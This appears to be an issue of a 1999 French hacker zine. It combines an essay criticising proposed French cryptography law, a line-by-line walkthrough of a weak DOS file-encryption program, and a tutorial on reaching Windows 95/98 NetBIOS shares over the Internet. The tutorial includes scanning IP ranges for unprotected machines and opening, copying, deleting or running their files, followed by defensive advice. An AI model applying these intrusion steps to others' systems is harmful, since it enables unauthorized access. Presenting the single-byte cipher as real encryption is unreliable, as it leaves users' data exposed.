des fins criminelles. L'ancienne sanction (10 000 F d'amende
pour usage sans autorisation, que ce soit pour
chiffrer son journal intime ou un ordre de mission
terroriste) ne pouvait manifestement dissuader
que les honnêtes gens, et n'a, à ma connaissance,
jamais été appliquée. On
arrive enfin à des dispositions pénales qui permettent de
prendre la loi au
sérieux.
Cependant, il aurait peut-être été
plus judicieux d'ajouter "puni d'une peine de plus de deux ans
d'emprisonnement" à la suite de "en vue
de faciliter la préparation ou la commission d'un crime ou
d'un délit". On peut en effet craindre
qu'un juge d'instruction ne puisse faire artificiellement tomber,
en invoquant le délit nouvellement créé,
la limite inféreure de deux ans de prison qui est lui est
nécessaire, en vertu de l'article 100
du Code de procédure pénale, pour ordonner une mise sur
écoute. Supposons qu'il soupçonne
quelqu'un d'un délit mineur ; comme l'usage de la cryptologie
non autorisée pour "faciliter la préparation
ou la commission" de ce délit constitue, lui, un délit
majeur, il suffirait qu'il l'inclue dans ses
soupçons pour pouvoir procéder aux écoutes... Les
"dispositions libérales" du projet de
loi aboutiraient en fait à des possibilités accrues d'interception.
Fourniture, importation et exportation illégales
Les peines pour fourniture sans autorisation sont
nettement renforcées : de 10 000 F d'amende, elles
passent à six mois de prison et 200 000
F d'amende. C'est plutôt sévère, mais sans conséquence
: il
fallait déjà être fou pour
fournir sciemment des solutions cryptologiques non autorisées en
France à
partir du territoire français, alors qu'il
suffisait, et qu'il suffit toujours, de franchir la frontière et
de
s'entendre avec un fournisseur étranger
pour être en règle avec la loi, quitte à priver, au
passage, la
nation française de revenus. Même
si l'exportation est interdite, on ne peut pas empêcher un
développeur de sortir du territoire avec
sa tête et ses idées. Et rien ne s'oppose à ce qu'il
rapatrie
ensuite des revenus tirés d'activités
qui seraient illégales en France, mais qui ne le sont pas dans le
pays où elles ont lieu - c'est ce que
font, par exemple, les entreprises qui délocalisent afin de profiter
de salaires inférieurs au SMIC français.
Cela dit, la même peine s'applique, non
seulement pour l'exportation, mais aussi pour l'importation à
partir d'un pays n'appartenant pas à l'Union
européenne, et cela, c'est franchement contestable.
Va-t-on mettre en prison les dizaines de milliers
d'utilisateurs des versions américaines de
Netscape ? Ceux qui auront eu le malheur de télécharger
PGP à partir de ifi.uio.no (Norvège, pays
qui a refusé par référendum
l'adhésion à l'Union), et non de ad.or.at (Autriche), cert.dfn.de
(Allemagne), encomix.es (Espagne), funet.fi (Finlande),
dsi.unimi.it (Italie), sunet.se (Suède) ou
ox.ac.uk (Royaume-Uni), qui sont tous situés
dans l'Union ?
Exercice illégal d'une activité de tiers de confiance
Le projet punit aussi deux ans de prison et de
300 000 F d'amende "le fait de gérer, pour le compte
d'autrui, des conventions secrètes de
moyens ou de prestations de cryptologie permettant d'assurer
des fonctions de confidentialité sans
avoir obtenu l'agrément [...] ou en dehors des conditions de cet
agrément".
L'étendue de ce nouveau délit est
difficile à cerner. Il est manifestement constitué dans le
cas d'un
serveur clandestin de clés de sessions
situé sur le territoire français, et à première
lecture, c'est bien
ce genre de choses qui seraient visées.
Dès lors qu'on impose aux tiers de confiance d'être agréés,
il
est logique qu'on punisse ceux qui ne le sont
pas, ou qui ne respectent pas les clauses de leur
agrément.
Le problème, c'est qu'il n'est nullement
nécessaire de recourir à un tiers, agréé ou
non, pour établir
une communication inviolable entre deux personnes.
Les rédacteurs du projet de loi semblent
convaincus qu'une bonne gestion de clés,
et en particulier une authentification fiable, suppose des
organismes centralisateurs ; M. Vincent-Carrefour,
l'ex-directeur de l'ancienne Délégation
Interministérielle pour la Sécurité
des Systèmes d'Information (DISSI) l'a d'ailleurs explicitement
affirmé. Ce n'est cependant pas le cas
; le système des tiers de confiance est une institution artificielle
créée pour des raisons de politique
de sécurité, non une nécessité technique. Un
système comme
PGP, et c'est justement son principal intérêt
théorique, ne suppose aucune gestion centralisée de
clés. L'authentification se fait au moyen
d'un "réseau de confiance" géré, si tant est que ce
mot est
approprié, par l'ensemble des utilisateurs
du monde entier.
Le problème se pose donc de savoir si un
logiciel comme PGP, ou même Netscape, Internet
Explorer ou d'autres permettant des communications
sécurisées par une clé publique chiffrant une clé
secrète de session, seront considérées
comme gérant une convention secrète pour le compte
d'autrui, cet autrui étant le destinataire
du message. La même question peut se poser pour des
procédés beaucoup plus simples
dans lesquels les deux correspondants partagent tout simplement la
même clé secrète - la gèrent-ils
pour le compte l'un de l'autre ? Si c'est le cas, et à moins d'une
autorisation, leur usage constitue un délit
puni de deux ans de prison, ce qui est justement (article
100 du CPP) la limite inférieure autorisant
une mise sur écoute judiciaire permettant de détecter
l'infraction.
Une telle interprétation peut être
soupçonnée par l'absence totale du mot "tiers" dans le texte
du
projet. On y parle d''autrui", ce qui inclut
logiquement le destinataire. En revanche, le contexte
général ansi que les expressions
"gérer" et plus encore "pour le compte de" suggèrent bien
une
activité de services du genre de ceux
que la loi prévoit pour les organismes agréés, lesquels,
en
général, ne seront ni l'émetteur,
ni le récepteur du message à chiffrer, mais bien leur fournisseur
d'une
prestation de cryptologie. Bref, le texte est
ambigu, et en l'absence de précisions dont on peut
craindre qu'elles ne seront données que
par la jurisprudence, le justiciable ne sait pas très bien de
qu'il risque.
Que risque-t-on à utiliser PGP ?
En effet, si par "autrui", on entend un tiers
: quelqu'un qui n'est ni l'émetteur, ni le destinataire du
message, ou si l'on considère que le fait
de fabriquer, sans que le destinataire l'ait commandé, une clé
de session que lui seul peut lire ne saurait
constituer à lui seul une gestion pour son compte, si, en
somme, ce qui est visé dans ce nouveau
délit d'exercice illégal d'une activité de tiers de
confiance est
bien ce qu'une lecture rapide peut faire penser,
la situation est très différente.
Dans une telle interprétation, il n'y aurait
pas grand risque à se servir de PGP ou d'un autre logiciel
analogue, dès lors que ce n'est pas à
des fins elle-mêmes délictueuses ou criminelles. Ce serait
interdit, bien sûr, mais ce ne serait,
au plus, qu'une contravention de 5e catégorie punissable d'une
amende de 10 000 F (20 000 en cas de récidive),
et encore, si le décret d'application en décidait
ainsi. On serait très loin du délit
puni de deux ans de prison au moins qui permettrait une écoute
pouvant donner lieu à des preuves non
nulles ; il serait donc en général difficile d'établir
l'infraction
d'une manière qui puisse aboutir à
une condamnation.
Ce ne serait que par l'usage de la cryptologie
non autorisée à des fins délictueuses ou criminelles
que
l'écoute judiciaire deviendrait possible,
et la détection plus facile. En somme, une interprétation
de ce
type, outre qu'elle semble très défendable
par rapport au texte, permettrait une sorte de compromis
honorable tacite entre les partisans par principe
d'une réglementation de la cryptologie, et ceux qui
pensent qu'elle devrait être autorisée,
dès lors que ce n'est pas à des fins illégales - une
sorte de
dépénalisation de fait. Mais il
n'est pas certain que c'est le point de vue qui va prévaloir en
pratique,
bien que des emprisonnements pour simple usage
de logiciels autorisés dans tout le reste du monde
démocratique auraient un impact désastreux
dans l'opinion publique mondiale.
Pas de sanctions spécifiques pour les tiers qui trahissent la confiance
Notons enfin que si le projet de loi prévoit
des sanctions sérieuses pour tout ce qui tendrait à diffuser
une cryptologie non contrôlée, en
revanche, il reste muet sur le manquement au secret professionnel
du tiers de confiance. Les "dispositions pénales
particulières" qui "sont prévues s'ils ne [se]
conformaient pas" aux "règles auxquelles
ils ont souscrit" mentionnées par la notice du ministère
concernent le cas où ils trahiraient la
confiance du gouvernement, non celui où ils trahiraient celle de
leurs clients. L'atteinte au secret professionnel
n'est puni que d'un an d'emprisonnement et de
100 000 F d'amende (article 226-13 du nouveau
Code pénal), soit la moitié de ce qui frappe la
gestion illicite de conventions secrètes
pour le compte d'autrui. Une fois de plus, on a l'impression
curieuse que le législateur se méfie
plus de ceux qui voudraient se préserver de l'espionnage que des
espions eux-mêmes.
Le problème des échanges internationaux
Avec l'essor des réseaux de communication,
le télépaiement, les téléconférences,
et même le
télétravail sans frontières
prendront de plus en plus d'importance. Ces évolutions ont besoin
de
garanties de confidentialité. L'interception
quasi systématique de tout ce qui circule sur le réseau est
évidemment tout à fait illégale
dans tous les pays démocratiques, mais il est à parier que
tous les
services secrets du monde la pratiquent quand
même à des fins de renseignement militaire,
diplomatique ou économique : on ne se
prive pas d'une source pareille. S'ajoute à cela la
délinquance "privée", de l'espionnage
industriel aux détournements de fonds électroniques en passant
par le chantage. Bref, on ne peut pas se permettre
d'utiliser l'Internet pour des échanges confidentiels
sans le secours de la cryptologie.
Or, le projet de loi précise que les organismes
agréés doivent exercer leurs activités sur le territoire
national. Dès lors, comment une entreprise
française pourra-t-elle utiliser les mêmes ressources de
communications rapides et sûres que ses
partenaires et ses concurrents étrangers ? Il n'y a plus qu'à
espérer que les autres pays du monde n'imposeront
pas des conditions analogues de contrôle
strictement national, sinon, la France ne pourra
pas bénéficier des échanges sécurisés
internationaux.
Elle risque de devoir cantonner son utilisation
des nouvelles techniques de télécommunications soit
dans un cadre purement hexagonal, soit pour des
applications dont le monde entier peut sans
dommage prendre connaissance.
Si l'on admet que le principe d'un mécanisme
de tiers de confiance puisse se justifier, il faudrait donc
qu'il soit adopté en des termes semblables
à l'échelle internationale. Il faudrait, par exemple, que
la
France admette le recours à des tiers
de confiance situés dans des pays avec lesquels il y aurait des
accords de réciprocité quant à
leur communication. Ce n'est pas évident à obtenir ; même
au sein de
l'Union européenne, tous les états
n'ont pas la même perception de la nécessité d'empêcher
les
citoyens de dissimuler leurs secrets à
leur guise, dès lors que ces secrets ne sont pas de nature
criminelle.
Une réglementation peut-elle être efficace ?
Personne ne peut souhaiter que la cryptologie favorise les activités contraires à la loi.
Cependant, on peut s'interroger sur l'efficacité
d'une réglementation, quelle qu'elle soit : il est loin
d'être évident que les criminels
les plus intelligents et les plus redoutables auront le bon goût
de s'y
soumettre... On voit mal les espions et terroristes
manipulés depuis l'étranger utiliser sagement les
mécanismes officiels français.
Quant aux trafiquants de drogue et autres grands criminels organisés,
ils ne vont pas adopter des procédés
autorisés mais peu sûrs de leur point de vue, même s'ils
encourent trois ans de prison de plus en en adoptant
d'autres - ils risquent déjà la perpétuité,
et leur
priorité, c'est de ne pas se faire prendre.
En outre, la détection de messages chiffrés
clandestins se heurte à des difficultés considérables,
à la
fois légales et techniques. Certes, on
peut supposer que les services secrets français, comme les
autres, ne s'embarrassent pas toujours des dispositions
de la loi pour espionner ce qui passe sur le
réseau. Cependant, il sera problématique
d'utiliser de tels renseignements dans un prétoire. Mais
surtout, il est techniquement difficile de repérer
ce qui, dans le flot des messages, pourrait constituer
un message chiffré : sa principale caractéristique
(une distribution régulière, en apparence aléatoire)
se retrouve également dans les fichiers
tout simplement comprimés. De plus, rien n'empêche, dans
l'état actuel de la législation,
d'envoyer sur les réseaux des fichiers réellement aléatoires,
et une
interdiction éventuelle se heurterait
à de grandes difficultés de définition. Enfin, et
sans entrer dans les
détails, il est parfaitement possible
de dissimuler des messages chiffrés dans des messages
d'apparence anodine.
Si donc ce sont les trafiquants de drogue et les
terroristes qui servent d'épouvantail pour justifier la
réglementation, ce ne sont probablement
pas eux qui sont, en fait, visés, mais plutôt les délinquants
"ordinaires". Une banalisation de procédés
cryptologiques facilement accessibles pourrait, en un
premier temps, les pousser dans une certaine
mesure à la faute. Evidemment, au bout de quelques
condamnations résultant d'interceptions
de messages chiffrés par des moyens autorisés, ils auront
compris - si les petits malfrats sont rarement
des candidats au prix Nobel, ils ne sont pas non plus
cliniquement idiots. Cela dit, la perspective
de trois ans de prison supplémentaires (à supposer qu'on
ne prononce pas la confusion des peines) peut
dissuader. En revanche, il ne faut pas s'attendre à ce
que la répression de la fourniture de
moyens non autorisés diminue le moins du monde leur
disponibilité. Il ne faut pas même
l'effort nécessaire à obtenir de fausses pièces d'identité
ou des
armes clandestines pour trouver des moyens de
cryptologie sûrs : il suffit de télécharger PGP.
Est-ce que, compte tenu des limites des résultats
qu'on peut en attendre, et des inconvénients, des
lourdeurs et des complications internationales
que cela implique, une réglementation du genre
proposé se justifie ? Le mécanisme
des tiers de confiance ne sera sûrement pas gratuit - que ce soit
l'utilisateur ou le contribuable, quelqu'un devra
le payer. Il en résultera forcément un certain obstacle
à la diffusion de la cryptologie, ce qui
est peut-être le but recherché, mais qui favorise l'espionnage,
et pas seulement au profit de l'administration
française.
Car il y a des alternatives moins contestables
pour lutter contre les abus de la cryptologie, et le
projet de loi en amorce une : réprimer,
non pas la cryptologie en soi, mais son utilisation à des fins
criminelles. Cependant, le projet s'arrête
en cours de route, obsédé par l'idée que c'est la
cryptologie
elle-même qui est en cause : il ne sanctionne
pas le fait d'utiliser un moyen de cryptologie à des fins
criminelles si le moyen est, lui, autorisé
! On aurait pu dire, tout simplement, que l'usage de la
cryptologie en vue de dissimuler un crime ou
un délit constitue, de toutes façons, une circonstance
fortement aggravante. Et l'on peut réprimer
le refus, par l'intéressé lui-même, de fournir ses
clés à la
demande du juge d'instruction : c'est une entrave
à la justice par soustraction de documents, punie de
trois ans de prison et de 300 000 F d'amende
par l'article 434-4 du nouveau Code pénal - donc,
plus sévèrement que ce qui est
prévu le manquement à leurs devoirs de la part des tiers
de
confiance.
Toute nouvelle technique peut être détournée
à des fins criminelles. Quand la bande à Bonnot utilisa
pour la première fois un véhicule
automobile pour prendre la fuite après un vol à main armée,
on
aurait pu être tenté de limiter
l'usage de l'automobile... Dans le cas de la cryptologie, le problème
est
compliqué par le fait que les spécialistes
qui ont l'oreille du gouvernement sont soit des
professionnels du renseignement qui ne veulent
pas être privés de leurs sources, soit des inventeurs
de procédés de chiffrement à
destination militaire ou diplomatique qui voient d'un mauvais oeil leur
spécialité traditionellement très
discrète s'étaler désormais sur la place publique.
Il serait peut-être
temps que les pouvoirs publics se rendent compte
des dangers que font naître les obstacles à la
cryptologie, de la délinquance ordinaire
(chantage, détournements de fonds, intrusions sur les
ordinateurs, etc) jusqu'à l'espionnage
industriel international. En un mot, qu'ils se mettent un peu
moins dans la peau de l'espion pour se mettre
un peu plus dans celle de l'espionné.
Johannes Baagøe
Je pense que ça suffira amplement :-)))
Commençons à étuider le programme : comme nous l'avons vu dans le premier guide, il commence par une série de #include et puis par la fonction main:
#include "stdio.h"Ceci est aussitôt suivi des déclarations des variables :
#include "conio.h"
#include "dos.h"void main(void)
{
FILE *sourc,*dest;int code,verif,car=0,i,j,sur,oct;En examinant ces variables, 2 types nous sont inconnus : FILE , ainsi que date . struct n'est pas tout à fait un type de variable, c'est en fait une structure de données : un groupe contenant plusieurs données .Ces 2 types de données sont en fait définis dans le fichier dos.h , FILE est aussi une structure mais contenant des informations sur le fichier (son handle,sa taille,ses droits d'accès ...) alors que date contient 3 données ,une pour le jour,une pour le mois et une pour l'année ;celle-ci sont toujours appellées de la même manière, respectivement da_day,da_mon et da_year .Mais comme elles sont comprises dans une structure, pour les utiliser il faut utiliser le nom de la structure juste devant avec un point .Ici le nom de la structure est d .
char src[60],dst[60];struct date d;
Ensuite , nous avons les premières fonctionsd'initialisation :
getdate(&d);clrscr();La fonction clrscr() définie dans conio.h sert à effacer l'écran alors que la fonction getdate( struct date) permet d'initialiser une structure date à la date actuelle, c'est à dire mettre dans da_day le jour, dans da_mon le mois et dans da_year l'année .
Ensuite une petite routine permet de vérifier le millénaire actuel afin de n'afficher la date qu'avec l'année sur 2 chiffers ( 17/01/99 au lieu de 17/01/1999 ) :
if(d.da_year<2000)Ceci fait,le programme affiche quelques informations :
{d.da_year-=1900;}
else
{d.da_year-=2000;}
printf("\t\tEncryptor V 2.0\n");On constate que lors de l'affichage de la date, les variables sont référencées par d.da_day,d.da_mon et d.da_year ... Ensuite, une routine nous permet de demander lenom du fichier que l'utilisateur souhaite encrypter :
printf("%d/%d/%d\n",d.da_day,d.da_mon,d.da_year);
get_name:A l'aide de la fonction scanf() ,nous récupérons le nom du fichier d'origine, lui attribuons le pointeur de type FILE src via la fonction fopen(), puis vérifions l'état du pointeur src . Si celui-i vaut NULL, cela signifie qu'il s'est produit une erreur lors du chargement du fichier Si c'est le cas, nous dmandons àl'utilisaeur s'il veut resaisir un nom ou quitter le programme. Pour cela nous utilisons la fonction getch() combinées à une structure conditionnelle switch()
printf("Name of the file to encrypt or decrypt (with full path):\n");
scanf("%s",src);
sourc=fopen(src,"rb");
if(sourc==NULL)
{
printf("\aError opening file:(C)hange/(Q)uit\n");
ask_erase:
car=getch();
switch(car)
{
case 99:
goto get_name;
case 113:
goto end;
default:
goto ask_erase;
}
}
et_code:Cette routine permet donc de stocker dans les variables code et verif la somme des codes ASCII des tocuhes frappées par l'utilisateur en tant que code .C'est une des failles du programme dans la mesure ou les mots de passes "bc" et "ad" seront codés de la même manière ...
code=0;verif=0;
printf("Enter your encrypt-key:");
get_key:
car=getch();
switch(car)
{
case 13:
goto confirmation_code;
case 27:
clrscr();
printf("Are you sure?(Y/N)");
ask_other:
switch(sur)
{
case 121:
sur=getch();
goto end;
case 110:
clrscr();
printf("File to encrypt or decrypt:\n%s\n",src);
goto get_code;
}
goto ask_other;
default:
code +=car;
printf("*");
goto get_key;
}confirmation_code:
printf("\nConfirm your encrypt-key:");
reget_key:
car=getch();
switch(car)
{
case 13:
goto test_cod;
case 27:
clrscr();
printf("Are you sure?(Y/N)");
re_ask:
sur=getch();
switch(sur)
{
case 121:
goto end;
case 110:
printf("\nFile to encrypt or decrypt:\n%s\n",src);
goto get_code;
}
goto re_ask;
default:
verif +=car;
printf("*");
goto reget_key;
}
test_cod:Cette routine permet de vérifier que le code rentré puis confirmé sont bien les mêmes . Si c'est le cas, le programme poursuit l'exécution , sinon il revient à la demande de code après avoir réinitialisé les variables .
if(code==verif)
{
printf("\nOK...starting working");
goto encrypt;
}
else
{
clrscr();
printf("Error in confirming your encrypt-key...");
code=0;verif=0;
printf("\nFile to encrypt or decrypt:\n%s\n",src);
goto get_code;
}
encrypt:Ce passage demande à l'utilisateur le nom du fichier vers lequel il veut crypter ou décrypter le fichier source .Si celui-ci existe déjà, il lui demande s'il désire l'effacer .Pour celà, nous essayons d'abord d'ouvrir le fichier en mode lecture . Si le pointeur contient NULL, cela veut dire que le fichier n'existe pas . Sinon, le fichier existe déjà . Pour la demande à l'utilisateur,nous utilisons encore une structure conditionnelle switch().
printf("\nName of the encrypted or decrypted file to generate (with full path):\n");
scanf("%s",dst);
dest=fopen(dst,"rb");
if(dest!=NULL)
{
fclose(dest);
printf("File already exists:(O)verwrite/(C)hange name?");
re_ask2:
sur=getch();
switch(sur)
{
case 99:
clrscr();
goto encrypt;
case 111:
goto crypt;
default:
goto re_ask2;
}
}
crypt:Cette routine permet de préparer la procédure principale d'encryptage en ouvrant le fichier destination et en préparant la clé de cryptage en la remettant sur un octet c'est-à-dire entre 0 et 255 compris .Nous le faisons au moyen de la structure conditionnelle for();
for(car=0;code<0;code+=256);
for(car=0;code>255;code-=256);fclose(dest);
dest=fopen(dst,"wb");
cryptage:Voici la routine d'encryptage : celle-ci consiste a lire un octet du fichier, à y ajouter le code de l'utilisateur,à le rétablir sur un octet c'est-à-dire entre 0 et 255 compris et à faire l'inverse bit-à-bit ce qui consiste à soustraire la valeur à 255 . Le résultat de cette soustraction est écrite dans le fichier de destination . Si l'octet lu est le dernier, on quitte la rutine d'encryptage sinon on continue . Les fonctions fgetc() et fputc() permettent de respectivement lire et écrire un octet dans un fichier .
oct=fgetc(sourc);
if(feof(sourc))
{goto file_end;}oct +=code;
for(sur=0;oct<0;oct+=256);
for(sur=0;oct>255;oct-=256);
oct=255-oct;
fputc(oct,dest);
goto cryptage;
file_end:Cette série de 2 instructions permet d'une part d'effacer l'écran mais aussi de fermer tous les fichiers ouverts grace à fcloseall() . Ceci est très important dans la mesure ou les données ne sont écrites sur le disque qu'après fermeture des fichiers .
clrscr();
fcloseall();
printf("Delete old file: %s (y/n)?",src);Ici, nous demandons à l'utilisateur s'il souhaite effacer le fichier source . Si c'est le cas, nous n'allons pas directement effacer moyen de la command remove() . En effet, celle-ci ne protège pas contre les programmes comme undelete qui permettrait de retrouver le fichier . Nous allons d'abord l'ouvrir en écriture de manière à effacer son contenu puis nous y écrivons juste un octet nul , nous le refermons et l'effaçons ensuite avec remove . Il est toujurs accessible via undelete mais on accède à un fichier vide .
re_ask3:
i=getch();
switch(i)
{
case 121:
sourc=fopen(src,"rb");
fputc(0,sourc);
fclose(sourc);remove(src);
goto pre_end;
case 110:
goto pre_end;
default:
goto re_ask3;
}
pre_end:Voici les dernières instructions ,ainsi que la demande à l'utilisateur s'il possède d'autres fichiers à transformer .printf("\nEncrypting finished...\nAny other file to encrypt or decrypt (Y/N)?\n");
re_ask4:
car=getch();
switch(car)
{case 121:
oct=0;goto get_name;
case 110:
goto end;
default:
goto re_ask4;
}
end:
clrscr();
printf("\twww.multimania.com/xcpu:Encryptor V 2.0 coded by Bloodwaves\
\n\tBloodwaves@Hotmail.com January 1999");
fcloseall();
}
Bon,j'ai essayé via cette dissection de vous expliquer quelques
fonctions et principes du C sous Dos dumoins ... Le programme compilé
avec le listing sont téléchargeables juste en dessous.
Installation du réseau
En entreprise, ou à titre personnel pour les plus fortunés
d'entre-vous, chers amis lecteurs et bidouilleurs occasionnels, vous appréciez
particulièrement la mise en réseau des micro-ordinateurs,
liaison permettant un partage aisé des fichiers, des applications
et des ressources. Il est possible, sous Windows, de mettre en réseau
plusieurs systèmes en utilisant comme support réseau Internet.
Sous Windows, le réseau local échange les informations
au protocole NetBUI. Si vous n'avez pas activé ce réseau,
c'est très simple, sous Windows 95/98, procédez comme suit:
- bouton "Démarrer" - Paramètres - Panneau de configuration.
- dans le panneau de configuration, cliquez sur Réseau.
(voir figure 1)
- dans Réseau, cliquez sur Ajouter
- sélectionnez "client" et cliquez sur Ajouter
- sélectionnez ensuite Microsoft et comme client réseau
"Client pour réseau Microsoft".
Vous devez installer Client pour les réseaux Microsoft et Fichier
et imprimante partagés par le réseau Microsoft. Suivez le
reste de la procédure jusqu'au relancement de votre système.
Ayez le CD-Rom Windows 95/98 à portée de main, car il risque
de vous être demandé.
Si le réseau est correctement installé, vous devez avoir une nouvelle icône Voisinage réseau sur votre bureau. Si vous n'avez aucune liaison réseau, l'activation de cette icône vous indique que le parcours du réseau global est impossible.
Etablissement du réseau au travers d'Internet
Pour établir une connexion réseau entre deux PCs distants
au travers du réseau Internet, il faut d'abord que vous connaissiez
l'adresse IP du PC à relier. Demandez à votre correspondant
de vous la transmettre. Il faut qu'il clique sur Démarrer - Exécuter,
taper winipcfg et relever l'adresse IP de sa machine. Si vous avez une
liaison ICQ, il y a moyen de connaître cette adresse IP avec les
utilitaires adéquats.
Ensuite, utilisez le programme nbtstat.exe. Cliquez sur Démarrez
- Programmes - Commandes MSDOS. Sous DOS, il faut taper:
nbtstat -A <no_ip>
où <no_ip> est l'adresse IP de la machine cible à
laquelle vous souhaitez relier votre réseau local. Exemple:
nbtstat -A 175.193.256.35
Pour les besoins de notre démonstration, cette adresse est fictive.
Si le système cible est en réseau local NetBIOS, vous devez
avoir à l'affichage des informations renvoyées par l'exécution
de nbtstat. Dans les informations affichées, la seule qui nous intéresse
est pointée par <20>, sous le nom BRAUNEIG pour ce qui concerne
notre exemple de la figure 2. C'est le nom de l'ordinateur qu'il faut relier
à votre réseau local.
Toujours sous DOS, éditez le fichier lmhosts en tapant simplement:
EDIT LMHOSTS
Dans ce fichier, tapez simplement l'adresse IP de la machine cible,
suivi de son nom et de #PRE comme suit:
175.193.256.35 BRAUNEIG #PRE
Sauvez ce fichier sous le nom LMHOSTS et quittez l'éditeur. De
retour sous DOS, tapez:
nbtstat -R
C'est tout! Revenez sous Windows, cliquez sur Démarrer - Rechercher - Ordinateur. Comme nom d'ordinateur, indiquez celui qui a été saisi dans le fichier LMHOSTS. Si tout se passe bien, la machine cible s'affiche dans la fenêtre de résultat de recherche (voir figure 3). Cliquez simplement avec le bouton droit de la souris sur le nom de l'ordinateur dans cette fenêtre de recherche, puis cliquez sur Ouvrir.
Vous voilà connecté au système cible. Comme on peut le voir sur la figure 4, nous avons maintenant accès à toutes les ressources partagées du système cible. Nous pouvons visualiser le contenu de tous les dossiers de tous les disques accessibles, copier ces fichiers vers notre système, copier des fichiers depuis notre système vers le système cible, détruire, renommer, ouvrir mmêmeces fichiers et même exécuter des programmes! En cliquant sur un programme exécutable, il s'exécutera sur votre système. Oui, vous pouvez effectuer tout ce qui est concevable en réseau local au travers de votre extension de réseau Internet.
Les failles du réseau
L'établissement d'une extension de réseau local au travers
d'Internet n'est pas stable. Si le système distant se déconnecte
et se reconnecte, il y a de fortes probabilités pour que son adresse
IP change. Il vous faudra refaire toutes les manoeuvres pour rétablir
la liaison. Au bout de quelques essais, la liaison est rétablie
en quelques minutes.
L'établissement d'un réseau local au travers d'une liaison Internet par réseau RTC reste fastidieuse, mais est une bonne alternative pour permettre par exemple à un gestionnaire de parc PC de faire un peu de ménage dans un système mal utilisé, voir même d'installer à distance des applications et des fichiers. Cet établissement de réseau local devient nettement plus intéressant pour des abonnés connectés longtemps avec des adresses IP stables, cas des systèmes sur LS, abonnés câble ou ADSL.
La vitesse de communication sur cette exténsion du réseau local est tributaire des possibilités de votre matériel de communication, faible en RTC, beaucoup plus performante sur LS, ADSL ou réseau câblé.
Mais ce procédé d'extension du réseau local révèle un véritable problème de sécurité. Le système Windows ne fait aucune différence entre des ressources partagées sur le réseau strictement local et un système distant qui se connecte au travers d'Internet. Si le système exploite le partage de ses ressources sans mot de passe d'accès à ces ressources, il est vulnérable à toute attaque extérieure pendant qu'il navigue sur Internet.
Vous pensez qu'il est très aléatoire de tomber sur un système exploitant un réseau local non protégé. Détrompez-vous. Pour en avoir le cœur net (sans jeu de mot), nous avons utilisé un outil, WS-PingPro Pack, outil qui scanne une suite d'adresses IP et indique toutes les adresses IP actives. La simple manoeuvre effectuée par la commande nbtstat -A adresse_ip révèle toutes les adresses IP ayant un réseau NetBIOS actif. En moyenne, c'est près d'une adresse IP sur cinq qui répond positivement. Parmi ces adresses actives, nous en avons découvert sans aucune protection d'accès à leurs ressources.
En clair, il est donc possible de pénétrer ouvertement des systèmes sous Windows 95/98 exploitant un réseau local non protégé sous NetBIOS, à l'insu de son utilisateur, sans recourir à un logiciel serveur comme c'est le cas quand on utilise NetBus ou Back Orifice (voir Pirates no 2).
Les protections
Qu'il n'y ait aucune méprise! Si on vous révèle
une telle faille de sécurité, c'est justement pour vous expliquer
comment vous protéger.
La première protection, la plus élémentaire, naviguez sur Internet à partir d'un système non raccordé au réseau local. Nous serions mauvaises langues, nous vous conseillerions même de choisir un autre système d'exploitation que Windows. Mais vous n'avez probablement pas tellement le choix, en particulier dans votre environnement professionnel.
Donc, la seconde protection consiste à restreindre l'accès aux ressources de votre réseau local en modifiant les propriétés de chaque ressource de ce réseau. Par exemple, pour interdire l'accès à votre disque dur C, cliquez sur l'icône Poste de travail - sélectionnez le disque C - cliquez avec le bouton droit de la souris et sélectionnez Partage.
Vous pouvez ne pas partager le disque C, ou le partager en lecture seule, en accès complet ou en accès par mot de passe. Dans le premier et troisième cas, indiquez le mot de passe d'accès à votre disque C. Ainsi, les visiteurs indélicats devront montrer patte blanche.
Voici une astuce tordue pour savoir si vous avez un visiteur indélicat. Si vous n'utilisez pas le lecteur de disquette A pendant vos accès à Internet, partagez-le en accès complet et donnez-lui comme nom de partage PORNO-PICTS par exemple. Les hackers seront systématiquement attirés comme les mouches par le miel (ou moins ragoûtant, la m...). Donc, si votre disque A se met en action, vous avez très probablement un visiteur. Et pour connaître l'identité du visiteur, passez sous DOS et tapez simplement netstat. L'adresse IP sera très probablement indiquée par son nom de réseau.
Voilà... Cette 4e issue est finie je ne sais si il y en aura
une 5e! Après il n'y a plus grand chose à dire!
Bon alors bonne lecture!
Si vous voulez m'écrire: clad_strife@hotmail.com
Clad Strife.
